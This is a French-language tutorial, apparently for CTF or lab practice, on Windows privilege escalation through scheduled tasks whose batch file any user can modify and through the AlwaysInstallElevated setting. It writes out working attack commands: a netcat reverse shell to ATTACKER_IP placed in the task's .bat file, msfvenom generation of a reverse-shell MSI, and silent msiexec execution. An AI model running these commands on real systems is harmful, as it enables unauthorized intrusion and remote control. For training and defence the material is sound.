🏀Tache planifié

Ce tutoriel explore deux méthodes courantes d'élévation des privilèges : l'utilisation des tâches planifiées et la vulnérabilité AlwaysInstallElevated.

📅 Tâches Planifiées

Liste des Tâches Planifiées

  • Utilisez la commande schtasks pour lister les tâches planifiées sur le système cible.

    schtasks /query /fo list /v

Information détaillée sur une Tâche

  • Obtenez des détails sur une tâche spécifique (remplacez vulntask par le nom de la tâche souhaitée).

    schtasks /query /tn vulntask /fo list /v

Analyse des Autorisations du Fichier Exécutable

  • Vérifiez les autorisations du fichier exécutable de la tâche.

    icacls c:\\tasks\\schtask.bat

Le groupe BULTIN\Users a un accès complet (F) au binaire de la tâche. Cela signifie que nous pouvons modifier le fichier .bat et insérer la charge utile de notre choix.

Modification du Fichier Bat

  • Modifiez le fichier .bat pour exécuter une charge utile de votre choix.

    echo C:\\tools\\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\\tasks\\schtask.bat

Exécution de la Tâche Planifiée

  • Démarrez un écouteur sur l'attaquant.

    nc -lvp 4444
  • Exécutez la tâche planifiée.

    schtasks /run /tn vulntask

Réception du Shell Inversé

🔒 Vulnérabilité AlwaysInstallElevated

Introduction

Les fichiers d'installation Windows, tels que les fichiers .msi, sont cruciaux pour installer des applications sur un système. Par défaut, ils s'exécutent avec les privilèges de l'utilisateur qui les lance. Cependant, il est possible de configurer ces fichiers pour s'exécuter avec des privilèges plus élevés, même à partir de comptes utilisateurs sans privilèges. Cette méthode offre la possibilité de générer un fichier MSI malveillant pouvant s'exécuter avec des privilèges d'administrateur.

Note : La méthode AlwaysInstallElevated ne fonctionnera pas dans cet environnement spécifique et est fournie à titre d'information uniquement.

📁 Configuration des Valeurs de Registre

1. Vérification des Valeurs de Registre

Utilisez la commande reg query pour vérifier les valeurs de registre nécessaires.

reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer

2. Définition des Valeurs de Registre

Si les valeurs ne sont pas définies, vous devez les configurer. Cela peut être fait en utilisant des éditeurs de registre ou des commandes reg add. Par exemple :

reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

📄 Génération du Fichier MSI Malveillant

3. Utilisation de msfvenom

Utilisez msfvenom pour générer un fichier .msi malveillant.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

4. Transfert du Fichier MSI

Transférez le fichier .msi sur la machine cible, par exemple, dans le répertoire C:\\Windows\\Temp\\.

📥 Exécution du Programme d'Installation

5. Exécution de msiexec

Utilisez la commande msiexec pour exécuter le fichier MSI malveillant.

msiexec /quiet /qn /i C:\\Windows\\Temp\\malicious.msi

6. Réception du Shell Inversé

📚 Conclusion

L'élévation des privilèges peut exploiter des erreurs de configuration, telles que des tâches planifiées mal sécurisées ou des installations MSI avec des privilèges élevés. Ces méthodes, bien que souvent rencontrées dans des environnements de CTF, sont informatives pour comprendre les vulnérabilités potentielles.

Last updated